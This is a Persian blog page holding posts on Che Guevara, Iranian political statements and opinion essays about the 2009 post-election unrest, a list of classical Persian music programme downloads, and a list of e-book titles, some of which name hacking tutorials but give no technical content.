    كاسترو درباره او گفته است: در این دنیا همه چیز فناپذیر است، ولی "چه" گووارا در ذهن مردم برای همیشه زنده خواهد بود، زیرا او تنها در اندیشه مردم و سعادت آنان و جانش را در این راه نثار كرد.الیدا دختر و كامیلیو پسر "چه" همانند پدرشان انقلابی هستند.


    

ارنستو چگوارا

 

جسد دكتر چه گوارا پس از قتل در بهداری نظامی بولیوی



 

ارنستو چگوارا
   

 منبع : ایمیل دوستان

کیانوش انصاری بازدید : 122 دوشنبه 26 مهر 1389 نظرات (0)
هاشمي رفسنجاني اهانت به امام(ره) و رهبر انقلاب را محکوم کرد
رييس مجمع تشخيص مصلحت نظام در اطلاعيه‌اي، اهانت به تمثال مبارک حضرت امام خميني (ره) ‌و رهبر معظم انقلاب را محکوم کرد و اين اقدام را سزاوار تقبيح دانست.
به گزارش ايرنا به نقل از دفتر رييس مجمع تشخيص مصلحت نظام، حجت الاسلام والمسلمين اکبر هاشمي رفسنجاني در اين اطلاعيه تصريح کرده است: اهانت به تصوير مبارک امام راحل، بنيانگذار جمهوري اسلامي ايران و رهبر معظم انقلاب از سوي هر کس و با هر هدفي که انجام يافته عملي ناروا و زيان بخش و سزاوار تقبيح است.
در ادامه اين اطلاعيه آمده است: هوشياري و نشان دادن حساسيت از سوي اقشار ملت و به خصوص سلسله جليليه روحانيت درسي تاريخي به نمايش گذاشت که اميد مي رود از اين پس کسي جرأت اين گونه هتاکي ها را به خود راه ندهد.
رييس مجمع تشخيص مصلحت نظام به نمايندگي از سوي اعضاي مجلس خبرگان رهبري و مجمع تشخيص مصلحت نظام از هوشياري مردم تشکر و ابراز اميدواري کرده است بروز اين احساسات پاک درس عبرتي به بدخواهان باشد.
سيام*1862

انتهای خبر / خبرگزاری جمهوری اسلامی (ايرنا)
کیانوش انصاری بازدید : 118 دوشنبه 26 مهر 1389 نظرات (0)

رهبر حکومت انقلابی جمهوری اسلامی:

چرا هنگامی که سران ظلم و استکبار که مظهر آن امریکا، فرانسه و انگلیس است از آنها حمایت می کنند، متنبه نمی شوند؟ چرا هنگامی که افراد فاسد فراری و سلطنت طلب و توده ای از انها حمایت می کنند، به خود نمی آیند و متوجه نمی شوند که مسیر آنها غلط و اشتباه است؟



 آیت الله خامنه ای رهبر انقلاب اسلامی در آستانه ماه محرم در دیدار هزاران نفر از طلاب، روحانیون، فضلاء ، اساتید حوزه های علمیه و جمعی از ائمه جماعات مساجد تهران ، در سخنان بسیار مهمی، تبلیغ صحیح  را ایجاد روشنگری و شاخص سازی در جامعه بخصوص در دوران فتنه دانستند و با اشاره به قضایای بعد از انتخابات بویژه اقدام اخیر دشمنان ملت ایران در اهانت به امام راحل (ره)، از حضور آگاهانه مردم در صحنه، قدردانی و همه آحاد مردم بویژه دانشجویان را به آرامش دعوت و خاطرنشان کردند: این بنای استوار که هندسه آن الهی است و بنای آنهم با دست یک مرد الهی پایه ریزی شده و بقای آن نیز به پشتوانه یک ملت الهی است، استوار خواهد ماند، و مخالفان آن به اهداف خود نخواهند رسید.
حضرت آیت الله خامنه ای در تبیین نقش تبلیغ و روشنگری صحیح در دوران فتنه به قضایای بعد از انتخابات اشاره کردند و افزودند:

بعد از انتخابات، متأسفانه عده ای قانون شکنی، و ایجاد اغتشاش کردند و زمینه ای را به وجود آوردند که دشمنِ مأیوس و ناامید، جان بگیرد و آنقدر جسارت پیدا بکند، که در مقابل چشم انبوه دانشجویان علاقه مند به امام، انقلاب و نظام اسلامی به امام (ره) اهانت کند.
ایشان خاطرنشان کردند:

این اهانت بزرگ، نتیجه آن قانون شکنی ها و دل خوش کردن به تشویق های رسانه های بیگانه بود و حالا که این خطاها و کارهای اشتباه انجام شده، برای پنهان کردن آن، به فلسفه بافی و استدلال تراشی روی آورده اند.
رهبر انقلاب اسلامی اینگونه فلسفه بافی ها بعد از خطاهای مکرر را عامل اصلی فتنه و غبارآلود شدن فضا دانستند و تأکید کردند:

عده ای با شعار طرفداری از قانون، عمل خلاف قانون انجام می دهند، این عده شعار طرفداری از امام می دهند، اما کاری می کنند که نسبت به امام(ره) چنین گناه بزرگی انجام شود و دشمنان با خوشحالی براساس این اقدامات، تحلیل کنند و بعد هم برضد مصالح ملی و ملت ایران، تصمیم بگیرند. مشکل اصلی همین حرف ها و عمل های فریبکارانه و غبارآلودگی فضا است..
  آیت الله خامنه ای افزودند:

آن کسی که برای اسلام، انقلاب، و امام کار می کند، به محض اینکه ببیند، حرف و حرکت او موجب ایجاد جهت گیری بر ضد اصول شده، بلافاصله متنبه می شود و مسیر خود را اصلاح می کند. اما چرا این آقایان متنبه نمی شوند.
ایشان خاطرنشان کردند:

وقتی از اصلی ترین شعار جمهوری اسلامی، یعنی استقلال، آزادی، جمهوری اسلامی، اسلام آن حذف می شود، آقایان باید به خود بیایند و بفهمند که راه غلطی را می روند، وقتی در روز قدس که اساس آن برای دفاع از فلسطین و مقابله با رژیم صهیونیستی است، به نفع رژیم غاصب و برضد فلسطین شعار داده می شود، باید متنبه شوند و تبری خود را از این جریان اعلام کنند.
رهبر انقلاب اسلامی افزودند:

چرا هنگامی که سران ظلم و استکبار که مظهر آن امریکا، فرانسه و انگلیس است از آنها حمایت می کنند، متنبه نمی شوند. چرا هنگامی که افراد فاسد فراری و سلطنت طلب و توده ای از انها حمایت می کنند، به خود نمی آیند و متوجه نمی شوند که مسیر آنها غلط و اشتباه است؟
  آیت الله خامنه ای تأکید کردند:

چشم خود را باز کنید و از این جریان تبری بجویید. آیا می شود به بهانه عقلانیت، این حقایق روشن را نادیده گرفت. نادیده گرفتن این حقایق، درست نقطه مقابل عقل است.
ایشان خاطرنشان کردند:

عقل حکم می کند، در قضیه اهانت به امام (ره) بجای آنکه منکر اصل قضیه شوید، اهانت را محکوم کنید و بالاتر از آن به حقیقت و عمق این اقدام پی ببرید و متوجه شوید که دشمن کجا را هدف گرفته و بدنبال چیست.
رهبر انقلاب اسلامی افزودند:

این برادران سابق ما که اسم و رسم خود را مدیون انقلاب اسلامی هستند، چرا به خود نمی آیند و چرا نمی بینند که دشمنان انقلاب و امام چگونه از سخنان و اقدامات آنان خوشحالند و کف و سوت می زنند و عکس آنان را سردست گرفته اند.
حضرت آیت الله خامنه ای با تأکید بر اینکه انتخابات براساس قانون انجام و تمام شد و اشکالی هم بر آن وارد نبود، خاطرنشان کردند:

پایبندی به قانون اقتضا می کند که اگر رئیس جمهور منتخب را هم قبول نداشته باشیم، اما در مقابل قانون خاضع باشیم و به آن احترام بگذاریم.
ایشان با اشاره به جدایی برخی یاران امام و انقلاب در دوران امام و زاویه پیدا کردن آنان با امام (ره) و مطرود شدنشان، افزودند: این مسائل باید برای همه ما عبرت باشد البته من همانگونه که در نمازجمعه گفتم قائل به جذب حداکثری و دفع حداقلی هستم ولی برخی افراد ظاهراً خودشان اصرار بر فاصله گرفتن از نظام، و طرد شدن دارند.
رهبر انقلاب اسلامی عده قلیلی را که بواسطه سخنان و حرکات برخی افراد جسارت پیدا کرده و در مقابل نظام ایستاده اند، در برابر عظمت ملت ایران، صفر دانستند و تأکید کردند: این نظام، نظام الهی است و در طول سی سال گذشته، خداوند متعال بارها لطف و حمایت خود را در حق نظام اسلامی نشان داده است و اگر ما با خدا باشیم قطعاً خدا هم با ما خواهد بود.
حضرت آیت الله خامنه ای خاطرنشان کردند: مطمئناً دشمنان نظام اسلامی و جهانخوارانی که می خواهند با منطق های مغلوط بر دنیا مسلط شوند، از این ملت و ملت های مستقل تو دهنی خواهند خورد.
ایشان با تأکید بر اینکه دشمنان نظام، همچنان انقلاب اسلامی، امام راحل عظیم الشأن، ملت مقاوم ایران و جوانان این ملت را نشناخته اند، افزودند: دانشجویان، امروز از لحاظ علمی و معنوی جزو برترین دانشجویان هستند و همواره هوشیارانه در صحنه حضور دارند و در قضایای اخیر هم بارها امتحان خوبی داده اند.
رهبر انقلاب اسلامی با اشاره به خشم و ناراحتی قشرهای مختلف مردم، در پی اهانت به امام راحل (ره)، این واکنش ها و اعلام برائت ها را به حق و مناسب دانستند و تأکید کردند: همه باید آرامش خود را حفظ کنند و بدانند کسانی که در مقابل ملت قرار گرفته اند، بی ریشه هستند و در برابر عظمت ملت ایران و انقلاب اسلامی توانایی ماندن نخواهند داشت.
حضرت آیت الله خامنه ای با تأکید بر اینکه اگر لازم باشد مسئولان و حافظان قانون، به وظیفه خود عمل خواهند کرد، افزودند: البته دانشجویان موظفند، افرادی را که منشأ فساد هستند، شناسایی و به دیگران معرفی کنند اما همه کارها باید با آرامش انجام شود.
ایشان حفظ آرامش و امنیت را مهمترین وظیفه برشمردند و خاطرنشان کردند: دشمنانی که به دنبال ایجاد ناامنی و اغتشاش هستند با مردم طرف هستند و البته دستگاههای قانونی هم وظایفی دارند که باید به وظایف خود عمل کنند.
رهبر انقلاب اسلامی تأکید کردند: دشمنان ملت ایران و نظام اسلامی همچون کف روی آب هستند که از بین خواهند رفت و آن چیزی که باقی می ماند اصل نظام اسلامی است.



منبع: پایگاه اطلاع رسانی دفتر مقام معظم رهبری
کیانوش انصاری بازدید : 133 دوشنبه 26 مهر 1389 نظرات (0)

به نام خدا

میرحسین موسوی کاندیدای دهمین کرسی ریاست جمهوری ایران بعد از انتخابات دهمین دوره ی ریاست جمهوری با وارد کردن اتهام تقلب و تخلفات گسترده به دولت؛ طرفداران خود  را به خیابان خوانده و از آنها راهپیمائی گسترده و صلح آمیز و اعتراض در چهارچوب قانون را خواستار شد. از آنجا که نه مردم معترض و نه دولت مستقر جنبه ی تجمعات و اعتراضات مسالمت آمیز و قانونی را نداشتند این تجمعات به شورش ها و آشوب های از یاد نرفتنی تبدیل شد که در پی آن خیلی از معترضین، دولت، مردم بی طرف و... خسارات و هزینه هایی را متحمل شدند. این هزینه ها زمانی توجیه پذیر است که دلیل و یا هدف آن مشخص و مفید باشد.

اینکه در انتخابات تخلفاتی صورت گرفته که گرفته ، عده ای بیایند و روز قدس که روز مبارزه با استکبار و استبداد و استعمار است را بر عکس روال گذشته شرکت بکنند و علیه جریان سیاست های نظام حرکت بکنند و شعارهای متضاد بدهند بی شک مسئله ی کوچکی نیست.

 این یعنی نه گفتن به بخشی از سیاست های اصیل نظام که برای مردم معترض و نخبگان و حاکمیت هزینه های سنگینی دارد.

 اینکه سال روز 13 آبان بر خلاف گذشته شعار مرگ بر امریکا را حذف کرده و شعار مرگ بر روسیه داده شود ساده نیست.

 این یعنی متهم کردن حکومت به مستعمره ی روسیه بودن و این یعنی اینکه دیگر ارزش ها و روز های این حکومت برای شعاردهندگان و رهبران آنها بی ارزش است و این یعنی نا فرمانی مدنی!

موسوی به اعتراض به تخلف در انتخابات نافرمانی مدنی می کند؟!!!

اگر واقعن اینگونه باشد؛ می شود گفت موسوی زیاده روی می کند و اعتراض به تخلف در انتخابات راه قانونی هم دارد و یا همان تجمعات ابتدائی نیز کافی بود و دلیلی برای ادامه اعتراضات تا حد نافرمانی مدنی وجود نداشت. از طرفی مردم معترض در خیابان ها شعار های تندی علیه کل نظام می دهند و از برخی شعار ها که معمولن همه گیر هم می شود برمی آید که معترضین اصلن جمهوری اسلامی را رد می کنند  و خواهان حکومتی با ساختار متفاوتند اما موسوی می گوید ولایت فقیه، قانون اساسی و در کل نظام مستقر را به رسمیت می شناسد و قبول دارد و از گفته ها و رفتارش پیداست که ایشان تنها با دولت احمدی نژاد مشکل دارند و انتخابات دهمین دوره ی ریاست جمهوری را مردود می دانند و به رسمیت نمی شناسند..

مواضع میرحسین موسوی و معترضان با هم متفاوت است و موسوی واقعن برای جامعه مشخص نمی کند چه هدفی دارد و چه برنامه ای و چرا؛ و دچار یک بی نظمی ست.

آیا موسوی معتقد است "جمهوری ایرانی حق مسلم ماست" آیا شعارها و رفتار معترضین مسیر مناسبی را طی می کند؟

در این انتخابات دیده شد که موسوی پشت سر خود طرفدارانی دارد که به دلایل و بهانه های خودشان از وی حمایت کردند و شاید از خیلی جهات نیز با هم متفاوت فکر میکنند اما همینک موسوی نه به عنوان یک کاندیدا و نه حتی به عنوان نامزد معترض بلکه به عنوان رهبر یک جنبش اعتراضی پیش می رود اما خودش حتی یک بار این مقام را به رسمیت نشناخته ایشان در بیانیه ها فقط به دولت احمدی نژاد اعتراض می کند.

 اما شعارهای تظاهرکنندگانی که وی را رهبر خود معرفی می کنند کل نظام را نشانه گرفته؛ به نظر می رسد وی باید اصول و اعتقادات و آنچه را که برنامه و خواسته ی اوست باز تعریف کرده تا شفاف سازی بیشتری شود.

 آیا موسوی هنوز هم جمهوری بدون اسلامیت را جمهوری وابسته و اسلام بدون مشروعیت مردمی را تحجر میداند؟

 و یا چون معترضانی که وی را رهبر خود می خوانند جمهوری ایرانی را خواستار است؟

آیا این هزینه هایی که مردم می دهند برای تغییر کل نظام است؟ یا باطل کردن انتخابات؟! یا فشار برای به دست آوردن قدرت؟ یا یک لجبازی بین نخبگان بیش نیست؟ چرا میرحسین موسوی شفاف تر و روشن تر مواضعش را تبیین نمی کند؟

 چرا باید مردم قربانی آن چیزی بشوند که خود هرگز نمی خواستند؟

ادامه ی این روند پر از ابهام، ادامه ی ضربه به ستون های نظامیست که پی آنرا خون بسیاری از مردان و زنان آزاده و شهید آبیاری و استوار کرده اند.

با لحظه ای توقف و اندیشیدن به مسیری که طی کرده ایم و می کنیم و نگاه به آینده ای که برآیند اتفاقاتی ست که ما می سازیم اگر نیتی صادقانه و خیر در کار باشد می توان از گم راه فاصله گرفت و به خیر نزدیک تر شد.

کیانوش انصاری

۸۸/۰۸/۲۰

کیانوش انصاری بازدید : 140 دوشنبه 26 مهر 1389 نظرات (0)

صادقانه و بی پرده برای روشنایی

دور دهم انتخابات ریاست جمهوری؟!!!

 

کیانوش انصاری: "یک عده که اگر می خواستند در زمان خود می توانستند با اقلیت باشند و از درد آنها بگویند، در زمان قدرت خود نان خود را آجر نکردند و قدرت را برای خود و دوستانشان حفظ و بر محرومین اخم کردند حالا که در جنگ قدرت قدرت طلبان منافعشان در خطر است و یا از بین رفته و چیزی برای از دست دادن ندارند از شکاف های (تاسف بار) جامعه استفاده کرده و در پی امتیاز گرفتنند. و خون سهراب ها و نداها حاصل کوچکیست از لجبازی ایشان"

 

دور دهم انتخابات ریاست جمهوری در ایران را می توان جزو انتخابات های دوقطبی دانست که دو جناه با تمام توان خود و با حداکثر یکپارچگی وارد عرصه ی رغابت شدند و نبردی تمام عیار را به نمایش گذاشتند این نبرد آنقدر سرعت و قدرت و هیجان با خود به همراه گرفت که نامزدان کرسی ریاست جمهوری در مناظرات به بدترین شکل گفتار با هم به مسابقه پرداختند. رغابت آنقدر شدید شد که به وفور در مواردی دیده شد که جناه هایی که مدعی کرسی اجرای قانون و حراست از آن را داشتند به راحتی قانون را زیر پا می گذاشتند و به هیچ چیز جز برنده شدن (مهم تر از آن؛ شکست رغیب) فکر نمی کردند. این رغابت که در آن هیچ بویی از رفاقت به مشام نمی رسید به کینه و کدورت های دنباله داری تبدیل شد که هنوز کشور از صدمات آن در امان نیست. اما جدای از بحث انتخابات و حاشیه های پر رنگ تر از متن و چرایی های آن مسئله ای که میشود گفت این است که متاسفانه امروز در جامعه ی ما قشر وسیعی از مردم در دو جبهه با شکاف های عمیق علیه هم قرار گرفتند و در ظاهر و باطن با هم در جنگ و نبرد هستند. این نبردها آنگاه که به پایان برسد (که هیچ چشم اندازی نیست) برای مردم چه میراثی به ارمغان دارد؟

مردم از هم کینه ای، با هم دشمن، تنگ نظری و بی اخلاقی، حذف و سرکوب و سرکوفت یک دیگر و در کل جامعه ی قهر با هم.

برای چه؟

این تظاهرات خیابانی و دعوا ها چگونه و از کجا و شروع شد؟

عده ای از افراد که به صفوف معترضین پیوستند کسانی هستند که بر آزادی، شرافت، فساد ستیزی، عدالت و آزادی ایمان دارند و برخی بدقواره گی ها در سیستم و بداخلاقی ها در مدیران دلشان را شکسته و ناامیدند از انصاف حاکم بر سرنوشتشان و می خواهند آن را تغییر دهند. اما جدای از عقیده ها و عقده ها باید به انصاف و عدل به قضاوت و نقد نشست و عاقلانه ره یافت. این قشر باید از خود سوال کند که برای چه و به چه امیدی مبارزه می کند و برای خود و کشورش هزینه ها می پردازد؟ که به عدالت و آزادی و شرافت و سلامت برسد؟ مگر زمانی که آقای کروبی در بنیاد شهید بودند و یا رئیس مجلس، هیچ بی عدالتی نبود و یا زمانی که جناب موسوی نخست وزیر بودند؟ مگر زمانی که آقای هاشمی رئیس جمهور بودند مشکلات نبود؟ مگر در دوران خاتمی سیستم همین بدقواره گی هایی که الان مورد اعتراض آقایان است را نداشت؟ پس چرا آن وقت که آقایان در قدرت بودند سینه برای حکومت چاک کردند؟ حتی آقای خاتمی در شرایطی قرار گرفتند که عده زیادی از جوانان طرفدار ایشان شعار گذر از خاتمی دادند چون از ایشان انتظار داشتند راهی را برود که الان می رود... اما چرا در آن زمان آقای خاتمی رئیس جمهور دوم خردادی و آقای کروبی رئیس مجلس اصلاحات اینگونه اسب خود را نتاختند که الان گرد و خاک کرده اند؟ زمانی که تعداد کثیری از نامزدان انخابات مجلس هفتم رد شدند آقای کروبی نه تنها تحریم نکرد بلکه برای بالا بردن میزان شرکت کنندگان در انتخابات رغابت کرد و بعد از رای نیاوردن استعفا داد (از شمردن رای هایش)؛ و حالا شده است مدافع کرباسچی ها و عبدی ها؟ آن زمان وقتی یکی از نماینده گان حرف از کوچکترین تغییر در قانون اساسی می زد آقای رئیس مجلس احکام حکومتی را به رخ ایشان می کشیدند و حالا به چه دلیل است که ناگاه خواهان تغییر کل نظام شدند؟ یافتن همین دلایل برای این نوشته مهم است تا حرف خود رسانده باشد.

آقای هاشمی که در زمان ریاست خود بر قوه ی مجریه به قول خودش "فیتیله ی ... را کشیدیم پائین" چطور شده حالا از حقوق اپوزیسیون حرف می زند؟ آقای هاشمی در گذشته چه کسی بودند و حال چه کسی هستند؟ این همه تغییر باعثش چیست؟ آیا برای هاشمی ها روند کنونی یک تاکتیک نیست؟ آیا این استراتژی آنان است؟

آیا همان معترضین نمی بینند که هاشمی چگونه از روند اعتراضاتشان کنار می کشد و پشت آنان را خالی می کند و باز هرگاه از فساد فرزندش و... صحبت می شود جوش می آورد و بر مواضعی که در خطبه های خود گرفت تاکید می کند؟ آیا نه این است که تمام غم هاشمی رفسنجانی پنهان ماندن سوء استفاده هایش از قدرت است و هیچ دلی برای زندانیان سیاسی و خانواده های آنان نمی سوزاند که زمانی از احمدی نژاد هم در دامن خود زندانی سیاسی بیشتر داشت؟

عده ای که بر فساد ستیزی تاکید دارند و پشت موسوی گام بر میدارند نمی بینند همراهی و دوستی هاشمی با او را؟ و نمی بینند که مبارزه با فساد و استبداد برای اصلاح طلبان فقط یک شعار پوچ بوده و خود گاهی شوکران استبداد را به فتوا می نشینند؟ مگر اکبر گنجی فراموش شده است که رفسنجانی را عالیجناب سرخ پوش خواند و هزاران فریاد و بیداد درست یا غلط؛ و آنگاه که اصلاح طلبان در جنگ قدرتشان حاضر به ائتلاف با هاشمی شدند اولین کارشان فروختن گنجی فراری شده بود که از حمله شدید بهزاد نبوی گرفته تا اظهار نظر های گوناگون با موضمون تند روی های غلط گنجی و...؟ مگر قهر و غضب افراد در احزاب حامی دمکراسی را نمی بینند با کسانی که در تضاد با تشخص طلبی آنها گام بردارند؟ کسانی که حتی شاید برای آنها در همان حزب سینه سپر کرده باشند! به راحتی چون یک ابزار مورد استفاده اند و چون یک ابزار به دور انداخته می شوند!!!

حقیقتن باید اندیشید که چرا باید با همنوعان و هموطنان خودمان، با همسایه و فامیل خودمان و... درگیر و در کشمکش باشیم؟

که فساد واقعی فرزندان هاشمی و امثال وی را افشا کردند؟ اگر منصف باشیم انصافن کار خوب و پسندیده ای کردند؛ این انتظاری بود که مردم از خاتمی داشتند.

که از کروبی پرسیدند که پول شهرام چه شد؟ خوب واقعن پول شهرام چه شد؟ چرا در بنیاد شهید شکنجه گاه ساخته بودید؟ چرا حجاج بیچاره و بی خبر را قربانی اهداف پاک یا نا پاک خود کردید؟

آیا کسی که رقمی کلان از شهرام جزایری گرفته و در مقابل سوالات در باره ی پول شهرام با پر رویی تمام مغالطه می کند و به دلیل عصبانیت از افشای فسادش مملکت را به بی نظمی تحریک می کند و جان و مال و ناموس مردم را به خطر می اندازد ارزش پیروی دارد؟ و اینگونه است که آنگاه که طرفدارانشان می خواستند همین راه را بروند اینان از خود گذشتگی نکردند و بر آنها اخم کرده و آنها را تنها گذاشتند...

آیا فردی که از شکست در یک انتخابات عصبانیست و از افشای فساد خود و فرزندانش ناراحت و خشمگین است شایسته ی پیروی افراد آزادی خواه هست؟ حال اینکه هرگاه به گذشته و کارنامه ی وی بنگریم می توان دید که واقعن ایشان چقدر خواهان آزادی و طالب استقلال حقوق شهروندان و چقدر در سیاستشان شفاف هستند؛ خواهیم دید ایشان چقدر مظلوم تشریف دارند و آن زمان که قدرت داشتند چقدر ظلم نکردند و چقدر دیکتاتوری نفرمودند. که به اعتقاد بنده دوران ایشان بر مسند ریاست قوه ی مجریه دوران افول روح پاک و سالم انقلابی و دوران رشد فساد و تبعیض در بدنه ی دولت و به طبع در میان جامعه بود.

اگر واقعن اینان به دنبال تغییر کلی نظام هستند چرا در درجه ی اول درباره ی گذشته خود نمی گویند و آن را نقد و رد نمی کنند؟ که هنوز هم گذشته خود را سرمایه ی خود می شمارند؟!!!

یک انقلابی چطور می تواند به دورانی از حکومتی که علیه آن قیام کرده بنازد؟

یک عده که اگر می خواستند در زمان خود می توانستند با اقلیت باشند و از درد آنها بگویند، در زمان قدرت خود نان خود را آجر نکردند و قدرت را برای خود و دوستانشان حفظ و بر محرومین اخم کردند حالا که در جنگ قدرت قدرت طلبان منافعشان در خطر است و یا از بین رفته و چیزی برای از دست دادن ندارند از شکاف های (تاسف بار) جامعه استفاده کرده و در پی امتیاز گرفتنند. و خون سهراب ها و نداها حاصل کوچکیست از لجبازی ایشان.

و از آن طرف آیا کسی که هیچ هراسی ندارد که به هفتاد میلیون نفر ایرانی که هیچ به تمام مردم دنیا در تریبون های مختلف دروغ و لاف تحویل بدهد فقط برای به چنگ آوردن قدرت و منافع تمامی مردم را به خاطر عقائد یک گروه به خطر می اندازد؛ کسی که چند ماه مانده به انتخابات حقوق قشری از کارمندان را به طور کم نظیری افزایش می دهد کسی که در آستانه ی انتخابات و حتی در ایام تبلیغات مشغول پول دادن به قشر نا آگاه مردم به اسم سهام عدالت است؛ کسی که خرافه پرستی و تحجر مسلک اوست، کسی که یک روز هاله نور به دنبال کله ی خود احساس می کند و روزی با وجود مدارک آن این ادعای خود را تکذیب می کند آیا خاطره اش ارزش پیروی و جنگ با هموطن دارد؟

آیا صحیح است که مردم مسلمان به خاطر قدرت طلبی و لجبازی عده ی قلیلی از نخبگان زیاده خواه با هم دشمن شوند و به ضعف هم تشنه باشند؟

البته چرایی شکاف هایی که امروز مورد سوء استفاده است را هم باید دید و درس گرفت و برای رفع آنان کوشید، با چه کسانی که بد نکردند... بگذریم

ناگفته نماند که تخلفات بسیار در این انتخابات را هم نمی توان نادیده گرفت و البته تقلب اندک بود؛ که اگر این تخلفات نبود رئیس جمهور محترم فعلی بک دهم رایی که آوردند را هم نداشتند. از این رو عده ای احساس می کنند که در این انتخابات به حق آنان جفا شده. که واقعن هم شده.

اما وقتی این موضوعات می شود بهانه ای برای آشوب و مغلطه ی یک عده قدرت طلب رانده شده از قدرت، ترجیح من این است که در موردشان سکوت کنم.

کیانوش انصاری بازدید : 171 دوشنبه 26 مهر 1389 نظرات (0)

1


برنامه شماره 102 -  قطعاتی در سه گاه

فریدون حافظی : تار

اسداله ملک : ویولون

به همراهی ضرب امیر بیداریان

 

لینکهای دانلود : 1 و 2 و 3

 



2


برنامه شماره 113 -  قطعاتی در مخالف سه گاه

هنرمندان : اسداله ملک ، فریدون حافظی

منصور نریمان ، محمد موسوی ، ناصر افتتاح

 

لینکهای دانلود : 1 و 2 و 3

 


3


برنامه شماره 115 -  قطعاتی در شور

هنرمندان : حبیب اله بدیعی

منصور صارمی ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

4


برنامه شماره 117 -  قطعاتی در سه گاه

هنرمندان : حبیب اله بدیعی

منصور صارمی، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

5


برنامه شماره 124 -  قطعاتی در شوشتری

هنرمندان : اسداله ملک

منصور نریمان ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

6


برنامه شماره 126 -  قطعاتی در دشتی

هنرمندان : اسداله ملک

مجید نجاحی ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

7


برنامه شماره 155 -  قطعاتی در اصفهان

هنرمندان : جواد معروفی

حبیب اله بدیعی ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 


8


برنامه شماره 157 -  قطعاتی در دشتی

هنرمندان : پرویز یاحقی

جلیل شهناز ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3




9


برنامه شماره 197 -  قطعاتی در مخالف سه گاه

هنرمندان : احمد عبادی

محمد موسوی ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3




10


برنامه شماره 200 -  قطعاتی در شور

هنرمندان : پرویز یاحقی ، جلیل شهناز

فضل اله توکل ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3


 

11


برنامه شماره 203 - قطعاتی در ابوعطا

هنرمندان : احمد عبادی

اسداله ملک ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

12


برنامه شماره 205 - قطعاتی در بیات ترک

هنرمندان : احمد عبادی

اسداله ملک ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

13


برنامه شماره 212 - قطعاتی در دشتی

هنرمندان : احمد عبادی

اسداله ملک ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

14


برنامه شماره 213 - قطعاتی در افشاری

هنرمندان : اسداله ملک، رضا ورزنده

منصور نریمان ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3


 

15


برنامه شماره 220 - قطعاتی در مخالف سه گاه

هنرمندان : اسداله ملک، فرهنگ شریف

محمد موسوی ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

16


برنامه شماره 221 - قطعاتی در مخالف سه گاه

هنرمندان : پرویز یاحقی، جلیل شهناز

فضل اله توکل ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

17


برنامه شماره 223 - قطعاتی در بیات ترک

هنرمندان : پرویز یاحقی ، جلیل شهناز

فضل اله توکل ، جهانگیر ملک

 

لینکهای  دانلود : 1 و 2 و 3

 

18


برنامه شماره 224 - قطعاتی در بیات ترک

هنرمندان : احمد عبادی

اسداله ملک ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

19


برنامه شماره 227 - قطعاتی در همایون

هنرمندان : پرویز یاحقی ، جلیل شهناز

فضل اله توکل ، جهانگیر ملک

 

لینکهای دانلود : 1 و 2 و 3

 

20


برنامه شماره 248 - قطعاتی در ماهور

هنرمندان : حبیب اله بدیعی

منصور صارمی ، جهانگیر ملک

 

لینکهای  دانلود : 1 و 2 و 3

کیانوش انصاری بازدید : 206 دوشنبه 26 مهر 1389 نظرات (0)

موزش HTML

آموزش ASP.NET (پیشرفته)

آموزش ASP.NET

دنیای اسلام

نفوذ به شبکه‌های بی‌سیم

انقلاب ایران و سقوط پادشاهی

آموزش هک و امنیت شبکه

راهنمای امنیت فناوری اطلاعات

آموزش کاربردی توابع VB.Net

زندگی‌نامه‌ی تولستوی

آشنایی با سیستم عامل لینوکس

آموزش VB.NET

قصه‌های شیخ اشراق

مقاله (آموزش هک، نفوذ به سایت بانک تجارت چگونه انجام شد)

گرامر برای مکالمه زبان انگلیسی

هری پاتر و زندانی آزکابان

امنیت سرور لینوکس

کتاب الکترونیکی آشپزی

آموزش مقدماتی کامپیوتر

زایمان و فراتر از آن

جمعیت و تنظیم خانواده

هری پاتر و جام آتش

خسرو و شیرین

استقرار نظام مدیریت بر عملکرد

آموزش قدم به قدم هک

میترایسم، مهر و مهرپرستی

گرامر برای مکالمه زبان انگلیسی (بخش دوم)

دانلود کتاب : زندگی‌نامه بیل گیتس (بخش اول)

مرجع ترفندهای رجیستری

دانلود کتاب : اصول مطالعه

دانلود کتاب : مجموعه سوالات کنکور کارشناسی ارشد، مهندسی کامپیوتر

دانلود کتاب : ویجا

دانلود کتاب : مجموعه داستان

سلاطین دنیای زیر زمینی هکرها

برنامه نویسی برای سیستم عامل سیمبین

آموزش مقدماتی Crack

دانلود کتاب : همسران رضاشاه

دانلود کتاب : لیلی و مجنون

دانلود کتاب : گلستان سعدی

راهنمای رهیاب‌های (روتر) سیسکو

زنده به گور (مجموعه داستان)

مجموعه مقاله (صهیونیسم)

الوهیم مرا به سیاره خویش بردند

مجموعه مقالات برنامه‌نویسی (سایت Dev.ir)

دانلود کتاب : برنامه نویسی (الگوریتم، فلوچارت و زبان VB)

دانلود کتاب : فالون گونگ

دانلود کتاب : مارکسیسم و فرمالیسم

دانلود کتاب : تبارشناسی فلسفه تربیتی نانوشته

دانلود کتاب : ویژوال بیسیک در N+1 روز

دانلود کتاب : سلامت طبیعی، داروهای طبیعی

کتاب : یبوست در آسیب طناب نخاعی

بیماری مزمن کلیه در بیماران مبتلا به آسیب نخاعی

دانلود کتاب : ای شمع‌ها بسوزید

دانلود کتاب : اندر لطایف روزگار

دانلود کتاب : برگشت ادرار از مثانه به حالب در بیماران مبتلا به آسیب نخاعی

دانلود کتاب : اتونومیک دیس رفلکسی (اختلال واکنشی سیستم عصبی اتونومیک

دانلود کتاب : هر آن چه که لازم است درباره ایدز بدانید

دانلود کتاب : تحقیقی تاریخی پیرامون تشیع، امامت، امامان و مهدویت

